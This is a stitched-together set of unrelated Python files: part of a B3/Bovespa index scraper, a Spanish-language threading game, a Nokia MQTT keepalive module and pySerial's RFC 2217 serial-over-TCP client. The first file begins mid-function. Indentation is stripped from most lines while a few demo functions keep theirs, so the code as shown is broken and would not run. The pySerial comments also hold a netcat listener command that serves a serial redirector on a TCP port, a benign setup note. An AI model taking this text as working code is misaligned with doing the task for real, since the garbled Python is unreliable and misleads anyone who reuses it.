try:
comp = indexes[i]['composition']
if 'failed' not in comp:
soup = bs(requests.get(comp).text, 'html.parser')
frame_html = soup.select('iframe[src*="bovespa"]')[0]['src'].replace('pt-br', 'en-us')
print(frame_html)
comp_df = pd.read_html(requests.get(frame_html).text)[0]
last_col = comp_df.columns[len(comp_df.columns)-1]
agora = datetime.now().strftime('_%d-%b-%Y_%H%M%S.csv')
df_index = comp_df.sort_values(last_col, ascending=False)
df_index.to_csv(os.path.join(csv_path, i + agora), index=False)
indexes[i]['dataframe'] = df_index
else:
print(i + ' failed')
indexes[i]['dataframe'] = '*** no dataframe ***'
    except Exception:
indexes[i]['dataframe'] = '*** no dataframe ***'
def get_index_composition_csv(indexes):
csv_path = r'c:\temp\auxpy'
shutil.rmtree(csv_path, ignore_errors=True)
os.makedirs(csv_path, exist_ok=True)
threads = []
for i in indexes:
t = Thread(target=get_composition, args=([i, indexes, csv_path]))
threads.append(t)
t.start()
[t.join() for t in threads]
#==================================================================================================
def trim_url(url):
last_slash = url[::-1].find('/')
clean_url = url[:len(url) - last_slash]
return clean_url
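# Worked example for trim_url (illustrative URL): it keeps everything up to and
# including the last '/', which is what get_url() needs to turn the relative
# "composicao" href into an absolute link.
def _demo_trim_url():
    url = 'http://www.bmfbovespa.com.br/pt_br/produtos/indices/indice-x'
    assert trim_url(url) == 'http://www.bmfbovespa.com.br/pt_br/produtos/indices/'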
if __name__ == '__main__':
start = time.perf_counter()
urls = get_b3_indexes_composition_url()
get_index_composition_csv(urls)
end = time.perf_counter()
print('{} seconds'.format(end-start))
|
Hilos1.py
|
import threading
import sys
import time
from random import randint
print('SUPER THREADING GAME v0.1 By Iván Sánchez')
print()
# Declare the global variables that hold the random numbers
number1 = 0
number2 = 0
ejecutarHilo_1 = True
ejecutarHilo_2 = True
# Function that generates a new random number
def generate_random_number():
return randint(1, 99)
def hilo1():
global number1, ejecutarHilo_1
time.sleep(100 / generate_random_number())
while ejecutarHilo_1:
number1 = generate_random_number()
print('Hilo 1: ' + str(number1))
print('')
time.sleep(3)
def hilo2():
global number2, ejecutarHilo_2
time.sleep(100 / generate_random_number())
while ejecutarHilo_2:
number2 = generate_random_number()
print('Hilo 2: ' + str(number2))
print('')
time.sleep(3)
print('Muy bien, las instrucciones son simples. En la pantalla apareceran numeros aleatorios entre el 0 y el 100')
print('Tu mision (si decides aceptarla 8) sera intruducir esos valores antes de que el tiempo termine')
print('Si no logras ingresar los valores, el juego continuara generando números aleatorios')
start = input('>> ¿Deseas comenzar el desafio? (yes) (y/n): ')
if start == 'n' or start == 'no':
print('Ahh... que nena :(')
sys.exit()
print()
print('Ready? Goo!')
print()
time.sleep(1)
start_time = time.time()
hilo_1 = threading.Thread(target=hilo1)
hilo_1.start()
hilo_2 = threading.Thread(target=hilo2)
hilo_2.start()
while hilo_1.is_alive() or hilo_2.is_alive():
isThisNumber = int(input(''))
if isThisNumber == number1:
ejecutarHilo_1 = False
print('Bien mataste al hilo 1')
print('')
elif isThisNumber == number2:
ejecutarHilo_2 = False
print('Bien mataste al hilo 2')
print('')
else:
print('Uy, que lento!')
final_time = time.time() - start_time
print('Has terminado con todos los hilos ¡Felicidades!')
print('/---------------------------------------------------\ ')
print('| SCORE / PUNTUACION |')
print('|---------------------------------------------------| ')
print('|----------|----------------------------------------| ')
print('| Time | ' + str(final_time) + ' Seg |')
print('\----------|----------------------------------------/ ')
|
mqtt.py
|
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
import paho.mqtt.client as mqtt
import a10.structures.identity
import a10.asvr.db.configuration
import threading
import time
import logging
def on_connect(client, metadata, flags, rc):
    print("Connected mqtt: {}".format(rc))
def on_disconnect(client, userdata, rc):
    # paho-mqtt invokes this callback as (client, userdata, rc)
    logging.info("disconnecting reason " + str(rc))
    client.connected_flag = False
    client.disconnect_flag = True
    print("MQTT Disconnected")
    try:
        client.reconnect()
    except Exception:
        print("Connection is fscked")
def publish(ch, t, op, data):
payload = str({"t": t, "op": op, "data": data})
mqttc.publish(ch, payload)
def sendKeepAlive():
print(
"Starting keepalive ping with rate ",
a10.asvr.db.configuration.MQTTKEEPALIVEPING,
)
while True:
print("ping!")
publish(
"AS/MQTTPING",
"ping",
"ping",
{"session": a10.asvr.db.configuration.ASSESSIONIDENTITY},
)
time.sleep(int(a10.asvr.db.configuration.MQTTKEEPALIVEPING))
print(a10.asvr.db.configuration.MQTTADDRESS)
#
# This is a bit nasty, but if two clients have the same name then the earlier one
# will be kicked off by the MQTT broker - at least in mosquitto
# So we will add the AS_Session_Identity and a UUID
#
id = (
a10.asvr.db.configuration.MQTTCLIENTNAME
+ "_"
+ a10.asvr.db.configuration.ASSESSIONIDENTITY
+ "_"
+ a10.structures.identity.generateID()
)
print("mqtt client id is ", id)
mqttc = mqtt.Client(id)
mqttc.on_connect = on_connect
mqttc.on_disconnect = on_disconnect
mqttc.connect(a10.asvr.db.configuration.MQTTADDRESS, port=a10.asvr.db.configuration.MQTTPORT)
# KEEP ALIVE PING
print("Starting keep alive thead")
keepalivethread = threading.Thread(target=sendKeepAlive)
print("Keep alive thread ID is ", keepalivethread)
keepalivethread.start()
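# --- Consumer sketch (not part of this module) ---
# publish() above sends a stringified dict to a channel; a receiver built on the
# same paho-mqtt API could look like the function below. The client name and the
# use of loop_forever() are illustrative choices, not requirements of this module.
def _demo_subscribe(channel="AS/MQTTPING"):
    def on_message(client, userdata, msg):
        # msg.payload is the str(dict) produced by publish()
        print("received on", msg.topic, ":", msg.payload.decode("utf-8"))
    sub = mqtt.Client("a10_demo_subscriber")
    sub.on_message = on_message
    sub.connect(a10.asvr.db.configuration.MQTTADDRESS,
                port=a10.asvr.db.configuration.MQTTPORT)
    sub.subscribe(channel)
    sub.loop_forever()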
|
rfc2217.py
|
#! python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# see __init__.py
#
# This module implements an RFC 2217 compatible client. RFC 2217 describes a
# protocol to access serial ports over TCP/IP and allows setting the baud rate,
# modem control lines etc.
#
# (C) 2001-2013 Chris Liechti <cliechti@gmx.net>
# this is distributed under a free software license, see license.txt
# TODO:
# - setting control line -> answer is not checked (had problems with one of the
# servers). Consider implementing a compatibility mode flag to make the check
# conditional
# - write timeout not implemented at all
##############################################################################
# observations and issues with servers
#=============================================================================
# sredird V2.2.1
# - http://www.ibiblio.org/pub/Linux/system/serial/ sredird-2.2.2.tar.gz
# - does not acknowledge SET_CONTROL (RTS/DTR) correctly, always responding
# [105 1] instead of the actual value.
# - SET_BAUDRATE answer contains 4 extra null bytes -> probably for larger
# numbers than 2**32?
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: while true; do nc -l -p 7000 -c "sredird debug /dev/ttyUSB0 /var/lock/sredir"; done
#=============================================================================
# telnetcpcd (untested)
# - http://ftp.wayne.edu/kermit/sredird/telnetcpcd-1.09.tar.gz
# - To get the signature [COM_PORT_OPTION] w/o data has to be sent.
#=============================================================================
# ser2net
# - does not negotiate BINARY or COM_PORT_OPTION for his side but at least
# acknowledges that the client activates these options
# - The configuration may be that the server prints a banner. As this client
# implementation does a flushInput on connect, this banner is hidden from
# the user application.
# - NOTIFY_MODEMSTATE: the poll interval of the server seems to be one
# second.
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: run ser2net daemon, in /etc/ser2net.conf:
# 2000:telnet:0:/dev/ttyS0:9600 remctl banner
##############################################################################
# How to identify ports? pySerial might want to support other protocols in the
# future, so let's use a URL scheme.
# for RFC2217 compliant servers we will use this:
# rfc2217://<host>:<port>[/option[/option...]]
#
# options:
# - "debug" print diagnostic messages
# - "ign_set_control": do not look at the answers to SET_CONTROL
# - "poll_modem": issue NOTIFY_MODEMSTATE requests when CTS/DTR/RI/CD is read.
# Without this option it expects that the server sends notifications
# automatically on change (which most servers do and is according to the
# RFC).
# the order of the options is not relevant
from serial.serialutil import *
import time
import struct
import socket
import threading
import queue
import logging
# port string is expected to be something like this:
# rfc2217://host:port
# host may be an IP or including domain, whatever.
# port is 0...65535
# map log level names to constants. used in fromURL()
LOGGER_LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
}
# telnet protocol characters
IAC = to_bytes([255]) # Interpret As Command
DONT = to_bytes([254])
DO = to_bytes([253])
WONT = to_bytes([252])
WILL = to_bytes([251])
IAC_DOUBLED = to_bytes([IAC, IAC])
SE = to_bytes([240]) # Subnegotiation End
NOP = to_bytes([241]) # No Operation
DM = to_bytes([242]) # Data Mark
BRK = to_bytes([243]) # Break
IP = to_bytes([244]) # Interrupt process
AO = to_bytes([245]) # Abort output
AYT = to_bytes([246]) # Are You There
EC = to_bytes([247]) # Erase Character
EL = to_bytes([248]) # Erase Line
GA = to_bytes([249]) # Go Ahead
SB = to_bytes([250]) # Subnegotiation Begin
# selected telnet options
BINARY = to_bytes([0]) # 8-bit data path
ECHO = to_bytes([1]) # echo
SGA = to_bytes([3]) # suppress go ahead
# RFC2217
COM_PORT_OPTION = to_bytes([44])
# Client to Access Server
SET_BAUDRATE = to_bytes([1])
SET_DATASIZE = to_bytes([2])
SET_PARITY = to_bytes([3])
SET_STOPSIZE = to_bytes([4])
SET_CONTROL = to_bytes([5])
NOTIFY_LINESTATE = to_bytes([6])
NOTIFY_MODEMSTATE = to_bytes([7])
FLOWCONTROL_SUSPEND = to_bytes([8])
FLOWCONTROL_RESUME = to_bytes([9])
SET_LINESTATE_MASK = to_bytes([10])
SET_MODEMSTATE_MASK = to_bytes([11])
PURGE_DATA = to_bytes([12])
SERVER_SET_BAUDRATE = to_bytes([101])
SERVER_SET_DATASIZE = to_bytes([102])
SERVER_SET_PARITY = to_bytes([103])
SERVER_SET_STOPSIZE = to_bytes([104])
SERVER_SET_CONTROL = to_bytes([105])
SERVER_NOTIFY_LINESTATE = to_bytes([106])
SERVER_NOTIFY_MODEMSTATE = to_bytes([107])
SERVER_FLOWCONTROL_SUSPEND = to_bytes([108])
SERVER_FLOWCONTROL_RESUME = to_bytes([109])
SERVER_SET_LINESTATE_MASK = to_bytes([110])
SERVER_SET_MODEMSTATE_MASK = to_bytes([111])
SERVER_PURGE_DATA = to_bytes([112])
RFC2217_ANSWER_MAP = {
SET_BAUDRATE: SERVER_SET_BAUDRATE,
SET_DATASIZE: SERVER_SET_DATASIZE,
SET_PARITY: SERVER_SET_PARITY,
SET_STOPSIZE: SERVER_SET_STOPSIZE,
SET_CONTROL: SERVER_SET_CONTROL,
NOTIFY_LINESTATE: SERVER_NOTIFY_LINESTATE,
NOTIFY_MODEMSTATE: SERVER_NOTIFY_MODEMSTATE,
FLOWCONTROL_SUSPEND: SERVER_FLOWCONTROL_SUSPEND,
FLOWCONTROL_RESUME: SERVER_FLOWCONTROL_RESUME,
SET_LINESTATE_MASK: SERVER_SET_LINESTATE_MASK,
SET_MODEMSTATE_MASK: SERVER_SET_MODEMSTATE_MASK,
PURGE_DATA: SERVER_PURGE_DATA,
}
SET_CONTROL_REQ_FLOW_SETTING = to_bytes([0]) # Request Com Port Flow Control Setting (outbound/both)
SET_CONTROL_USE_NO_FLOW_CONTROL = to_bytes([1]) # Use No Flow Control (outbound/both)
SET_CONTROL_USE_SW_FLOW_CONTROL = to_bytes([2]) # Use XON/XOFF Flow Control (outbound/both)
SET_CONTROL_USE_HW_FLOW_CONTROL = to_bytes([3]) # Use HARDWARE Flow Control (outbound/both)
SET_CONTROL_REQ_BREAK_STATE = to_bytes([4]) # Request BREAK State
SET_CONTROL_BREAK_ON = to_bytes([5]) # Set BREAK State ON
SET_CONTROL_BREAK_OFF = to_bytes([6]) # Set BREAK State OFF
SET_CONTROL_REQ_DTR = to_bytes([7]) # Request DTR Signal State
SET_CONTROL_DTR_ON = to_bytes([8]) # Set DTR Signal State ON
SET_CONTROL_DTR_OFF = to_bytes([9]) # Set DTR Signal State OFF
SET_CONTROL_REQ_RTS = to_bytes([10]) # Request RTS Signal State
SET_CONTROL_RTS_ON = to_bytes([11]) # Set RTS Signal State ON
SET_CONTROL_RTS_OFF = to_bytes([12]) # Set RTS Signal State OFF
SET_CONTROL_REQ_FLOW_SETTING_IN = to_bytes([13]) # Request Com Port Flow Control Setting (inbound)
SET_CONTROL_USE_NO_FLOW_CONTROL_IN = to_bytes([14]) # Use No Flow Control (inbound)
SET_CONTROL_USE_SW_FLOW_CONTOL_IN = to_bytes([15]) # Use XON/XOFF Flow Control (inbound)
SET_CONTROL_USE_HW_FLOW_CONTOL_IN = to_bytes([16]) # Use HARDWARE Flow Control (inbound)
SET_CONTROL_USE_DCD_FLOW_CONTROL = to_bytes([17]) # Use DCD Flow Control (outbound/both)
SET_CONTROL_USE_DTR_FLOW_CONTROL = to_bytes([18]) # Use DTR Flow Control (inbound)
SET_CONTROL_USE_DSR_FLOW_CONTROL = to_bytes([19]) # Use DSR Flow Control (outbound/both)
LINESTATE_MASK_TIMEOUT = 128 # Time-out Error
LINESTATE_MASK_SHIFTREG_EMPTY = 64 # Transfer Shift Register Empty
LINESTATE_MASK_TRANSREG_EMPTY = 32 # Transfer Holding Register Empty
LINESTATE_MASK_BREAK_DETECT = 16 # Break-detect Error
LINESTATE_MASK_FRAMING_ERROR = 8 # Framing Error
LINESTATE_MASK_PARTIY_ERROR = 4 # Parity Error
LINESTATE_MASK_OVERRUN_ERROR = 2 # Overrun Error
LINESTATE_MASK_DATA_READY = 1 # Data Ready
MODEMSTATE_MASK_CD = 128 # Receive Line Signal Detect (also known as Carrier Detect)
MODEMSTATE_MASK_RI = 64 # Ring Indicator
MODEMSTATE_MASK_DSR = 32 # Data-Set-Ready Signal State
MODEMSTATE_MASK_CTS = 16 # Clear-To-Send Signal State
MODEMSTATE_MASK_CD_CHANGE = 8 # Delta Receive Line Signal Detect
MODEMSTATE_MASK_RI_CHANGE = 4 # Trailing-edge Ring Detector
MODEMSTATE_MASK_DSR_CHANGE = 2 # Delta Data-Set-Ready
MODEMSTATE_MASK_CTS_CHANGE = 1 # Delta Clear-To-Send
PURGE_RECEIVE_BUFFER = to_bytes([1]) # Purge access server receive data buffer
PURGE_TRANSMIT_BUFFER = to_bytes([2]) # Purge access server transmit data buffer
PURGE_BOTH_BUFFERS = to_bytes([3]) # Purge both the access server receive data buffer and the access server transmit data buffer
RFC2217_PARITY_MAP = {
PARITY_NONE: 1,
PARITY_ODD: 2,
PARITY_EVEN: 3,
PARITY_MARK: 4,
PARITY_SPACE: 5,
}
RFC2217_REVERSE_PARITY_MAP = dict((v,k) for k,v in list(RFC2217_PARITY_MAP.items()))
RFC2217_STOPBIT_MAP = {
STOPBITS_ONE: 1,
STOPBITS_ONE_POINT_FIVE: 3,
STOPBITS_TWO: 2,
}
RFC2217_REVERSE_STOPBIT_MAP = dict((v,k) for k,v in list(RFC2217_STOPBIT_MAP.items()))
# Telnet filter states
M_NORMAL = 0
M_IAC_SEEN = 1
M_NEGOTIATE = 2
# TelnetOption and TelnetSubnegotiation states
REQUESTED = 'REQUESTED'
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
REALLY_INACTIVE = 'REALLY_INACTIVE'
class TelnetOption(object):
"""Manage a single telnet option, keeps track of DO/DONT WILL/WONT."""
def __init__(self, connection, name, option, send_yes, send_no, ack_yes, ack_no, initial_state, activation_callback=None):
"""\
Initialize option.
:param connection: connection used to transmit answers
:param name: a readable name for debug outputs
:param send_yes: what to send when option is to be enabled.
:param send_no: what to send when option is to be disabled.
:param ack_yes: what to expect when remote agrees on option.
:param ack_no: what to expect when remote disagrees on option.
:param initial_state: options initialized with REQUESTED are tried to
be enabled on startup. use INACTIVE for all others.
"""
self.connection = connection
self.name = name
self.option = option
self.send_yes = send_yes
self.send_no = send_no
self.ack_yes = ack_yes
self.ack_no = ack_no
self.state = initial_state
self.active = False
self.activation_callback = activation_callback
def __repr__(self):
"""String for debug outputs"""
return "%s:%s(%s)" % (self.name, self.active, self.state)
def process_incoming(self, command):
"""\
A DO/DONT/WILL/WONT was received for this option, update state and
answer when needed.
"""
if command == self.ack_yes:
if self.state is REQUESTED:
self.state = ACTIVE
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is ACTIVE:
pass
elif self.state is INACTIVE:
self.state = ACTIVE
self.connection.telnetSendOption(self.send_yes, self.option)
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is REALLY_INACTIVE:
self.connection.telnetSendOption(self.send_no, self.option)
else:
raise ValueError('option in illegal state %r' % self)
elif command == self.ack_no:
if self.state is REQUESTED:
self.state = INACTIVE
self.active = False
elif self.state is ACTIVE:
self.state = INACTIVE
self.connection.telnetSendOption(self.send_no, self.option)
self.active = False
elif self.state is INACTIVE:
pass
elif self.state is REALLY_INACTIVE:
pass
else:
raise ValueError('option in illegal state %r' % self)
class TelnetSubnegotiation(object):
"""\
A object to handle subnegotiation of options. In this case actually
sub-sub options for RFC 2217. It is used to track com port options.
"""
def __init__(self, connection, name, option, ack_option=None):
if ack_option is None: ack_option = option
self.connection = connection
self.name = name
self.option = option
self.value = None
self.ack_option = ack_option
self.state = INACTIVE
def __repr__(self):
"""String for debug outputs."""
return "%s:%s" % (self.name, self.state)
def set(self, value):
"""\
        Request a change of the value. A request is sent to the server. If
        the client needs to know whether the change was performed, it has to
        check the state of this object.
"""
self.value = value
self.state = REQUESTED
self.connection.rfc2217SendSubnegotiation(self.option, self.value)
if self.connection.logger:
self.connection.logger.debug("SB Requesting %s -> %r" % (self.name, self.value))
def isReady(self):
"""\
Check if answer from server has been received. when server rejects
the change, raise a ValueError.
"""
if self.state == REALLY_INACTIVE:
raise ValueError("remote rejected value for option %r" % (self.name))
return self.state == ACTIVE
# add property to have a similar interface as TelnetOption
active = property(isReady)
def wait(self, timeout=3):
"""\
Wait until the subnegotiation has been acknowledged or timeout. It
can also throw a value error when the answer from the server does not
match the value sent.
"""
timeout_time = time.time() + timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if self.isReady():
break
else:
raise SerialException("timeout while waiting for option %r" % (self.name))
def checkAnswer(self, suboption):
"""\
Check an incoming subnegotiation block. The parameter already has
cut off the header like sub option number and com port option value.
"""
if self.value == suboption[:len(self.value)]:
self.state = ACTIVE
else:
# error propagation done in isReady
self.state = REALLY_INACTIVE
if self.connection.logger:
self.connection.logger.debug("SB Answer %s -> %r -> %s" % (self.name, suboption, self.state))
class RFC2217Serial(SerialBase):
"""Serial port implementation for RFC 2217 remote serial ports."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self._isOpen:
raise SerialException("Port is already open.")
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect(self.fromURL(self.portstr))
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except Exception as msg:
self._socket = None
raise SerialException("Could not open port %s: %s" % (self.portstr, msg))
self._socket.settimeout(5) # XXX good value?
        # use a thread safe queue as buffer. it also simplifies implementing
# the read timeout
self._read_buffer = queue.Queue()
        # to ensure that user writes do not interfere with internal
        # telnet/rfc2217 options, establish a lock
self._write_lock = threading.Lock()
# name the following separately so that, below, a check can be easily done
mandadory_options = [
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED),
]
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, REQUESTED),
] + mandadory_options
# RFC 2217 specific states
# COM port settings
self._rfc2217_port_settings = {
'baudrate': TelnetSubnegotiation(self, 'baudrate', SET_BAUDRATE, SERVER_SET_BAUDRATE),
'datasize': TelnetSubnegotiation(self, 'datasize', SET_DATASIZE, SERVER_SET_DATASIZE),
'parity': TelnetSubnegotiation(self, 'parity', SET_PARITY, SERVER_SET_PARITY),
'stopsize': TelnetSubnegotiation(self, 'stopsize', SET_STOPSIZE, SERVER_SET_STOPSIZE),
}
# There are more subnegotiation objects, combine all in one dictionary
# for easy access
self._rfc2217_options = {
'purge': TelnetSubnegotiation(self, 'purge', PURGE_DATA, SERVER_PURGE_DATA),
'control': TelnetSubnegotiation(self, 'control', SET_CONTROL, SERVER_SET_CONTROL),
}
self._rfc2217_options.update(self._rfc2217_port_settings)
# cache for line and modem states that the server sends to us
self._linestate = 0
self._modemstate = None
self._modemstate_expires = 0
# RFC 2217 flow control between server and client
self._remote_suspend_flow = False
self._thread = threading.Thread(target=self._telnetReadLoop)
self._thread.setDaemon(True)
self._thread.setName('pySerial RFC 2217 reader thread for %s' % (self._port,))
self._thread.start()
# negotiate Telnet/RFC 2217 -> send initial requests
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnetSendOption(option.send_yes, option.option)
# now wait until important options are negotiated
timeout_time = time.time() + self._network_timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in mandadory_options) == sum(o.state != INACTIVE for o in mandadory_options):
break
else:
raise SerialException("Remote does not seem to support RFC2217 or BINARY mode %r" % mandadory_options)
if self.logger:
self.logger.info("Negotiated options: %s" % self._telnet_options)
        # fine, go on, set RFC 2217 specific things
self._reconfigurePort()
        # all things are set up, now do a clean start
self._isOpen = True
if not self._rtscts:
self.setRTS(True)
self.setDTR(True)
self.flushInput()
self.flushOutput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self._socket is None:
raise SerialException("Can only operate on open ports")
# if self._timeout != 0 and self._interCharTimeout is not None:
# XXX
if self._writeTimeout is not None:
raise NotImplementedError('writeTimeout is currently not supported')
# XXX
# Setup the connection
# to get good performance, all parameter changes are sent first...
if not isinstance(self._baudrate, int) or not 0 < self._baudrate < 2**32:
raise ValueError("invalid baudrate: %r" % (self._baudrate))
self._rfc2217_port_settings['baudrate'].set(struct.pack('!I', self._baudrate))
self._rfc2217_port_settings['datasize'].set(struct.pack('!B', self._bytesize))
self._rfc2217_port_settings['parity'].set(struct.pack('!B', RFC2217_PARITY_MAP[self._parity]))
self._rfc2217_port_settings['stopsize'].set(struct.pack('!B', RFC2217_STOPBIT_MAP[self._stopbits]))
# and now wait until parameters are active
items = list(self._rfc2217_port_settings.values())
if self.logger:
self.logger.debug("Negotiating settings: %s" % (items,))
timeout_time = time.time() + self._network_timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in items) == len(items):
break
else:
raise SerialException("Remote does not accept parameter change (RFC2217): %r" % items)
if self.logger:
self.logger.info("Negotiated settings: %s" % (items,))
if self._rtscts and self._xonxoff:
raise ValueError('xonxoff and rtscts together are not supported')
elif self._rtscts:
self.rfc2217SetControl(SET_CONTROL_USE_HW_FLOW_CONTROL)
elif self._xonxoff:
self.rfc2217SetControl(SET_CONTROL_USE_SW_FLOW_CONTROL)
else:
self.rfc2217SetControl(SET_CONTROL_USE_NO_FLOW_CONTROL)
def close(self):
"""Close port"""
if self._isOpen:
if self._socket:
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except:
# ignore errors.
pass
self._socket = None
if self._thread:
self._thread.join()
self._isOpen = False
# in case of quick reconnects, give the server some time
time.sleep(0.3)
def makeDeviceName(self, port):
raise SerialException("there is no sensible way to turn numbers into URLs")
def fromURL(self, url):
"""extract host and port from an URL string"""
if url.lower().startswith("rfc2217://"): url = url[10:]
try:
# is there a "path" (our options)?
if '/' in url:
# cut away options
url, options = url.split('/', 1)
# process options now, directly altering self
for option in options.split('/'):
if '=' in option:
option, value = option.split('=', 1)
else:
value = None
if option == 'logging':
logging.basicConfig() # XXX is that good to call it here?
self.logger = logging.getLogger('pySerial.rfc2217')
self.logger.setLevel(LOGGER_LEVELS[value])
self.logger.debug('enabled logging')
elif option == 'ign_set_control':
self._ignore_set_control_answer = True
elif option == 'poll_modem':
self._poll_modem_state = True
elif option == 'timeout':
self._network_timeout = float(value)
else:
raise ValueError('unknown option: %r' % (option,))
# get host and port
host, port = url.split(':', 1) # may raise ValueError because of unpacking
port = int(port) # and this if it's not a number
if not 0 <= port < 65536: raise ValueError("port not in range 0...65535")
except ValueError as e:
raise SerialException('expected a string in the form "[rfc2217://]<host>:<port>[/option[/option...]]": %s' % e)
return (host, port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
if not self._isOpen: raise portNotOpenError
return self._read_buffer.qsize()
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read.
"""
if not self._isOpen: raise portNotOpenError
data = bytearray()
try:
while len(data) < size:
if self._thread is None:
raise SerialException('connection failed (reader thread died)')
data.append(self._read_buffer.get(True, self._timeout))
except queue.Empty: # -> timeout
pass
return bytes(data)
def write(self, data):
"""\
Output the given string over the serial port. Can block if the
connection is blocked. May raise SerialException if the connection is
closed.
"""
if not self._isOpen: raise portNotOpenError
self._write_lock.acquire()
try:
try:
self._socket.sendall(to_bytes(data).replace(IAC, IAC_DOUBLED))
except socket.error as e:
raise SerialException("connection failed (socket error): %s" % e) # XXX what exception if socket connection fails
finally:
self._write_lock.release()
return len(data)
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self._isOpen: raise portNotOpenError
self.rfc2217SendPurge(PURGE_RECEIVE_BUFFER)
# empty read buffer
while self._read_buffer.qsize():
self._read_buffer.get(False)
def flushOutput(self):
"""\
Clear output buffer, aborting the current output and
discarding all that is in the buffer.
"""
if not self._isOpen: raise portNotOpenError
self.rfc2217SendPurge(PURGE_TRANSMIT_BUFFER)
def sendBreak(self, duration=0.25):
"""\
Send break condition. Timed, returns to idle state after given
duration.
"""
if not self._isOpen: raise portNotOpenError
self.setBreak(True)
time.sleep(duration)
self.setBreak(False)
def setBreak(self, level=True):
"""\
        Set break: Controls TXD. When active, no transmitting is
        possible.
"""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set BREAK to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_BREAK_ON)
else:
self.rfc2217SetControl(SET_CONTROL_BREAK_OFF)
def setRTS(self, level=True):
"""Set terminal status line: Request To Send."""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set RTS to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_RTS_ON)
else:
self.rfc2217SetControl(SET_CONTROL_RTS_OFF)
def setDTR(self, level=True):
"""Set terminal status line: Data Terminal Ready."""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set DTR to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_DTR_ON)
else:
self.rfc2217SetControl(SET_CONTROL_DTR_OFF)
def getCTS(self):
"""Read terminal status line: Clear To Send."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_CTS)
def getDSR(self):
"""Read terminal status line: Data Set Ready."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_DSR)
def getRI(self):
"""Read terminal status line: Ring Indicator."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_RI)
def getCD(self):
"""Read terminal status line: Carrier Detect."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_CD)
# - - - platform specific - - -
# None so far
# - - - RFC2217 specific - - -
def _telnetReadLoop(self):
"""Read loop for the socket."""
mode = M_NORMAL
suboption = None
try:
while self._socket is not None:
try:
data = self._socket.recv(1024)
except socket.timeout:
                    # just need to get out of recv from time to time to check if
# still alive
continue
except socket.error as e:
# connection fails -> terminate loop
if self.logger:
self.logger.debug("socket error in reader thread: %s" % (e,))
break
if not data: break # lost connection
for byte in data:
if mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
mode = M_IAC_SEEN
else:
# store data in read buffer or sub option buffer
# depending on state
if suboption is not None:
suboption.append(byte)
else:
self._read_buffer.put(byte)
elif mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if suboption is not None:
suboption.append(IAC)
else:
self._read_buffer.put(IAC)
mode = M_NORMAL
elif byte == SB:
# sub option start
suboption = bytearray()
mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnetProcessSubnegotiation(bytes(suboption))
suboption = None
mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
telnet_command = byte
mode = M_NEGOTIATE
else:
# other telnet commands
self._telnetProcessCommand(byte)
mode = M_NORMAL
elif mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnetNegotiateOption(telnet_command, byte)
mode = M_NORMAL
finally:
self._thread = None
if self.logger:
self.logger.debug("read thread terminated")
# - incoming telnet commands and options
def _telnetProcessCommand(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: %r" % (command,))
